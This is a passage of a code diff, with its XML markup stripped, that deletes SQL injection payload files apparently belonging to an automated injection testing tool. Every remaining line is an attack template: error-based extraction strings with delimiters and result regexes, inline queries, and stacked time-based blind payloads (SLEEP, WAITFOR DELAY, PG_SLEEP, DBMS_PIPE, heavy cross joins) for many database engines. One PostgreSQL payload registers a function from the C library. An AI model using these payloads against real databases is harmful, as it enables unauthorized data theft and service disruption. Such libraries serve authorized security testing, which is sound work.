- 1
- 1,2,3,9
- 3
- (CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))
-
- (CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase error-based - Parameter replace
- 2
- 3
- 1
- 1,3
- 3
- (CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))
-
- (CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)
- 2
- 4
- 1
- 1,3
- 3
- (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')
-
- (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle error-based - Parameter replace
- 2
- 3
- 1
- 1,3
- 3
- (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
- (SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Firebird error-based - Parameter replace
- 2
- 4
- 1
- 1,3
- 3
- (SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))
-
- (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Firebird
-
-
-
-
- IBM DB2 error-based - Parameter replace
- 2
- 4
- 1
- 1,3
- 3
- RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- IBM DB2
-
-
-
-
-
-
- MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)
- 2
- 5
- 1
- 2,3
- 1
- ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)
-
- ,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)
- 2
- 5
- 1
- 2,3
- 1
- ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)))s)
-
- ,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)
- 2
- 5
- 1
- 2,3
- 1
- ,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])
-
- ,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.6
-
-
-
-
- MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)
- 2
- 5
- 1
- 2,3
- 1
- ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))))x)
-
- ,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.7.8
-
-
-
-
- MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)
- 2
- 4
- 1
- 2,3
- 1
- ,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
- ,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)
- 2
- 3
- 1
- 2,3
- 1
- ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
-
- ,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)
- 2
- 5
- 1
- 2,3
- 1
- ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
-
- ,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)
- 2
- 3
- 1
- 2,3
- 1
- ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)
-
- ,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 4.1
-
-
-
-
- PostgreSQL error-based - ORDER BY, GROUP BY clause
- 2
- 3
- 1
- 2,3
- 1
- ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))
-
- ,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)
- 2
- 5
- 1
- 2,3
- 1
- ,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))
-
- ,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase error-based - ORDER BY clause
- 2
- 4
- 1
- 3
- 1
- ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))
-
- ,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle error-based - ORDER BY, GROUP BY clause
- 2
- 4
- 1
- 2,3
- 1
- ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
- ,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Firebird error-based - ORDER BY clause
- 2
- 5
- 1
- 3
- 1
- ,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))
-
- ,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Firebird
-
-
-
-
- IBM DB2 error-based - ORDER BY clause
- 2
- 5
- 1
- 3
- 1
- ,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- ,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- IBM DB2
-
-
-
-
-
-
-
- Microsoft SQL Server/Sybase error-based - Stacking (EXEC)
- 2
- 2
- 1
- 1-8
- 1
- ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR]
-
- ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR]
- --
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
diff --git a/data/xml/payloads/inline_query.xml b/data/xml/payloads/inline_query.xml
deleted file mode 100644
index 7269be695c4..00000000000
--- a/data/xml/payloads/inline_query.xml
+++ /dev/null
@@ -1,157 +0,0 @@
-
-
-
-
-
- Generic inline queries
- 3
- 1
- 1
- 1,2,3,8
- 3
- (SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]'))
-
- (SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
-
-
- MySQL inline queries
- 3
- 2
- 1
- 1,2,3,8
- 3
- (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
-
- (SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
-
-
-
-
- PostgreSQL inline queries
- 3
- 2
- 1
- 1,2,3,8
- 3
- (SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')
-
- (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase inline queries
- 3
- 2
- 1
- 1,2,3,8
- 3
- (SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')
-
- (SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle inline queries
- 3
- 2
- 1
- 1,2,3,8
- 3
- (SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)
-
-
- (SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- SQLite inline queries
- 3
- 3
- 1
- 1,2,3,8
- 3
- SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'
-
- SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]'
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- SQLite
-
-
-
-
- Firebird inline queries
- 3
- 3
- 1
- 1,2,3,8
- 3
- SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE
-
- SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Firebird
-
-
-
-
- ClickHouse inline queries
- 3
- 3
- 1
- 1,2,3,8
- 3
- ('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
-
- ('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- ClickHouse
-
-
-
-
-
diff --git a/data/xml/payloads/stacked_queries.xml b/data/xml/payloads/stacked_queries.xml
deleted file mode 100644
index b431bb7849f..00000000000
--- a/data/xml/payloads/stacked_queries.xml
+++ /dev/null
@@ -1,730 +0,0 @@
-
-
-
-
-
- MySQL >= 5.0.12 stacked queries (comment)
- 4
- 2
- 1
- 1-8
- 1
- ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- ;SELECT SLEEP([SLEEPTIME])
- #
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 stacked queries
- 4
- 3
- 1
- 1-8
- 1
- ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- ;SELECT SLEEP([SLEEPTIME])
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 stacked queries (query SLEEP - comment)
- 4
- 3
- 1
- 1-8
- 1
- ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
- #
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL >= 5.0.12 stacked queries (query SLEEP)
- 4
- 4
- 1
- 1-8
- 1
- ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
-
-
-
-
-
- MySQL
- >= 5.0.12
-
-
-
-
- MySQL < 5.0.12 stacked queries (BENCHMARK - comment)
- 4
- 3
- 2
- 1-8
- 1
- ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
- #
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL < 5.0.12 stacked queries (BENCHMARK)
- 4
- 5
- 2
- 1-8
- 1
- ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
-
-
-
-
-
- MySQL
-
-
-
-
- PostgreSQL > 8.1 stacked queries (comment)
- 4
- 1
- 1
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- ;SELECT PG_SLEEP([SLEEPTIME])
- --
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL > 8.1 stacked queries
- 4
- 4
- 1
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- ;SELECT PG_SLEEP([SLEEPTIME])
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL stacked queries (heavy query - comment)
- 4
- 2
- 2
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)
- --
-
-
-
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL stacked queries (heavy query)
- 4
- 5
- 2
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)
-
-
-
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL < 8.2 stacked queries (Glibc - comment)
- 4
- 3
- 1
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])
- --
-
-
-
-
-
- PostgreSQL
- < 8.2
- Linux
-
-
-
-
- PostgreSQL < 8.2 stacked queries (Glibc)
- 4
- 5
- 1
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])
-
-
-
-
-
- PostgreSQL
- < 8.2
- Linux
-
-
-
-
- Microsoft SQL Server/Sybase stacked queries (comment)
- 4
- 1
- 1
- 1-8
- 1
- ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
-
- ;WAITFOR DELAY '0:0:[SLEEPTIME]'
- --
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)
- 4
- 2
- 1
- 1-8
- 1
- ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x
-
- ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x
- --
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase stacked queries
- 4
- 4
- 1
- 1-8
- 1
- ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
-
- ;WAITFOR DELAY '0:0:[SLEEPTIME]'
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase stacked queries (DECLARE)
- 4
- 5
- 1
- 1-8
- 1
- ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x
-
- ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x
-
-
-
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)
- 4
- 1
- 1
- 1-8
- 1
- ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL
-
- ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)
- 4
- 4
- 1
- 1-8
- 1
- ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL
-
- ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (heavy query - comment)
- 4
- 2
- 2
- 1-8
- 1
- ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL
-
- ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (heavy query)
- 4
- 5
- 2
- 1-8
- 1
- ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL
-
- ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (DBMS_LOCK.SLEEP - comment)
- 4
- 4
- 1
- 1-8
- 1
- ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END
-
- ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (DBMS_LOCK.SLEEP)
- 4
- 5
- 1
- 1-8
- 1
- ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END
-
- ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (USER_LOCK.SLEEP - comment)
- 4
- 5
- 1
- 1-8
- 1
- ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END
-
- ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END
- --
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle stacked queries (USER_LOCK.SLEEP)
- 4
- 5
- 1
- 1-8
- 1
- ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END
-
- ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END
-
-
-
-
-
- Oracle
-
-
-
-
- IBM DB2 stacked queries (heavy query - comment)
- 4
- 3
- 2
- 1-8
- 1
- ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])
-
- ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3
- --
-
-
-
-
-
- IBM DB2
-
-
-
-
- IBM DB2 stacked queries (heavy query)
- 4
- 5
- 2
- 1-8
- 1
- ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])
-
- ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3
-
-
-
-
-
- IBM DB2
-
-
-
-
- SQLite > 2.0 stacked queries (heavy query - comment)
- 4
- 3
- 2
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
- --
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- SQLite > 2.0 stacked queries (heavy query)
- 4
- 5
- 2
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- Firebird stacked queries (heavy query - comment)
- 4
- 4
- 2
- 1-8
- 1
- ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE
-
- ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4
- --
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- Firebird stacked queries (heavy query)
- 4
- 5
- 2
- 1-8
- 1
- ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE
-
- ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- SAP MaxDB stacked queries (heavy query - comment)
- 4
- 4
- 2
- 1-8
- 1
